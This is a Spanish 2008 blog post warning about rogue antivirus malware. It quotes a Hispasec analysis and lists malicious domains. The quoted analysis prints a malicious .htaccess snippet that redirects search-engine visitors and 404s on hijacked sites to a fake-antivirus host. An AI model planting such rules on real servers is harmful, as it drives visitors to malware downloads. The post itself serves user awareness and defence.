msc hotline sat
Friday, September 5, 2008
El periodo de vacaciones es el elegido por muchos coders (autores de código malware) para lanzar ataques víricos o propagar troyanos masivamente, bien a través de spam , bien infectando webs, cuyo acceso a las mismas visione un falso testeo, informando de la existencia de muchos virus en el ordenador y ofreciendo eliminarlos pulsando un botón, o a través de la necesidad de descargar códecs para ver determinados videos, todo lo cual sirve realmente para instalar el malware en cuestión.
Este verano han sido varios “FAKE ALERT” o “Rogue” los que, empezando a finales de Julio, han hecho el “Agosto” en dicho mes, llegando sus secuelas hasta la actualidad, primeros de Setiembre, y es que ha sido muy elevada la cantidad, variedad y picaresca utilizada para convencer al usuario de aceptar cualquiera de las opciones indicadas u otras similares.
Con el nombre de XP AntivirusPro 2008, XP Security Center, XP Antispyware 2008, MSAntivirus, SpywareScaner 2008, IEAntivirus, y empleando nombres de ficheros del sistema como el SVCHOST.EXE o el BEEP.SYS para ocultar sus engendros, ademas de otros cuyo nombre sonará a muchos usuarios, KARINA.DAT, BURITOS.EXE, BRAVIAX.EXE, etc., han inundado el parque informático de muchos usuarios, algunos de los cuales han perdido la paciencia ante la pesadez, resistencia a la eliminación y pérdida de tiempo ocasionada, por lo que además de ofrecer, entre el antivirus McAfee y nuestras utilidades ELISTARA.EXE y ELINOTIF.DLL la detección y eliminación de esta plaga, si bien van saliendo nuevas variantes o actualizaciones de las ya conocidas que hacen persistir la existencia de similares malwares en la actualidad, y se supone que en el futuro, avisamos de que si aparecen cualquiera de los tres supuestos indicados, le llegada de un correo ofreciendo una utilidad de testeo desconocida, o que al acceder a cualquier web se vea un testeo en el ordenador y un mensaje de alerta (falsa por supuesto) de que se han detectado muchos virus y se ofrece su eliminación pulsando un botón, o que le pidan un videocodec para poder visionar cualquier video, NO LO ACEPTE, lo mas probable es que con ello introduzca uno de estos pesadísimos malwares en su PC, y sea peor el remedio propuesto que la falsa enfermedad !
Ante cualquiera de estas posibilidades, consúltenos antes de aceptar, son muchos los casos que hemos atendido y, a pesar de este aviso, muchos los que prevemos tener que atender por todo lo indicado.
Pasado un mes del post inicial de este Tema, sigue aumentando día a día la plaga de estos malwares tipo FAKE ALERT o ROGUE.
Cada día tenemos nuevas incidencias de variantes no controladas, con nuevos nombres, ahora ya incluso del 2009, las cuales vamos controlando con las actualizaciones diarias del ELISTARA, o solicitando con ellas muestras de sospechosos para analizar.
Hoy vemos que los amigos de Hispasec han escrito nuevo articulo que amplia la informacion al respecto:
"Sergio de los Santos, de Hispasec,"
Los falsos antivirus y el uso fraudulento del .htaccess de páginas legítimas
La industria antivirus "alternativa" está en pleno auge. Se trata de antivirus falsos (llamados "rogue") que habitualmente se hacen pasar por una milagrosa cura para un sistema completamente infectado. Sus páginas parecen profesionales y engañan a los usuarios a través de una animación falsa donde supuestamente se detecta una gran cantidad de malware en el sistema y se propone la descarga del verdadero virus para desinfectar. Publicitar este tipo de "antivirus" es una tarea que se toman muy en serio.
Los antivirus "rogue" no son más que malware camuflado bajo el aspecto de un antivirus. Suelen diseñar una página de aspecto profesional desde donde puede descargarse. Para incitar a la instalación, simulan mediante una animación Flash que el sistema está siendo analizado en vivo y que se ha encontrado mucho malware que el falso antivirus puede eliminar. La animación suele ser la misma independientemente del sistema operativo que se utilice para visitar la web. Los creadores de este malware necesitan que se visite este tipo de páginas para que el usuario descargue y ejecute. Resulta una alternativa a la ejecución automática en la víctima aprovechando vulnerabilidades. Este sistema de ingeniería social cubre por ejemplo, la "cuota de mercado" que resta de usuarios que no pueden ser infectados a través de fallos de seguridad porque su sistema está al día.
Los dominios que alojan este tipo de malware se han multiplicado en el último año. Suelen tener el aspecto de: .
antivirus-scanner-online .com, online-av-scan2008 .com, antivirus-online-08 .com, anti-virus-xp .com, anti-virus-xp .net, i-spyware8 .com, anti-spyware4 .com, smartantivirus2009v2 .com, smartantivirus2009v2-buy .com, anti-spyware11 .com, anti-spyware10 .com, antivirus-cs1 .com antivirus-cs14 .com, anti-virusxp2008 .net, antimalware09 .com, antivirxp .net, av-xp08 .net, av-xp2008 .com, av-xp2008 .net, avx08 .net, axp2008 .com, e-antiviruspro .com, online-security-systems .com, xpprotector .com, pvrantivirus .com, wav2008 .com, wiav2009 .com, win-av .com, windows-av .com, windowsav .com y un largo etcétera.
La técnica que se está observando últimamente es la del uso de banners y anuncios (Adsense, principalmente) para invitar al usuario a la descarga del supuesto antivirus a través de una publicidad que parece "normal". Incluso invierten (probablemente usando tarjetas robadas) en anuncios en páginas legítimas. Ahora han ido un paso más allá usando el archivo .htaccess de servidores legítimos, que consiguen controlar bien robando sus credenciales o aprovechando fallos de seguridad del sitio.
.htaccess es un archivo de Apache que permite controlar el acceso al directorio web donde esté alojado. Permite bloquear el acceso por direcciones IP o por otras reglas. Una posibilidad es por ejemplo usar el REFERER, o "desde qué página se ha llegado" y poder redirigir al visitante en consecuencia gracias al RewriteEngine del servidor web.
Se han observado cambios como estos en los archivos .htaccess modificados en webs legítimas.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$
RewriteCond %{HTTP_REFERER} .*aol.*$
RewriteCond %{HTTP_REFERER} .*msn.*$
RewriteCond %{HTTP_REFERER} .*altavista.*$
RewriteCond %{HTTP_REFERER} .*ask.*$
RewriteCond %{HTTP_REFERER} .*yahoo.*$
RewriteRule .* http://webdelsupuestoantivirus.com
Errordocument 404 http://webdelsupuestoantivirus.com
Lo que resulta curioso. Si un usuario visita directamente una página web con el .htaccess modificado de esta forma, en principio no pasará nada. Pero si la visita se realiza desde uno de los buscadores que aparecen (la víctima viene de Google, AOL, msn...), como el HTTP_REFERER cumple una de las condiciones de la expresión regular, será redirigido según la regla "RewriteRule" a la web del supuesto antivirus de forma automática. También si se visita una web que no exista (el servidor devuelve un 404).
Resulta especialmente rebuscado, pero al parecer eficaz. Los atacantes están aprovechando cada vez más las etiquetas User-Agent y Referer del protocolo HTTP para "personalizar" ataques. Si no son imprescindibles para el usuario, se puede añadir una pequeña capa de protección modificando estos valores través de un proxy. Por supuesto, además, conviene descargar y utilizar antivirus sólo de marcas reconocidas.
Personalmente me ví atacado al entrar en una web, por uno de ellos, y ante una inesperada "exploracion" de mi equipo y la falsa noticia de que tenía mas de 1000 virus y que si quería eliminarlos (contestar Sí es secundar los intereses del troyano), detuve el proceso del Internet Explorer, cerré windows y reinicie el ordenador...
Pero claro, el sufrido usuario, ante un escaneo de un supuesto analisis vírico por parte de un aparente antivirus "con cara y ojos", y el ofrecimiento de poder eliminarlos, cuantos van a negarse ??? INGENIERIA SOCIAL, o picaresca aplicada sobre el particular, pero el caso es que sigue aumentando la plaga !
MUCHO CUIDADO AHÍ FUERA !
:roll:
RSS Noticias 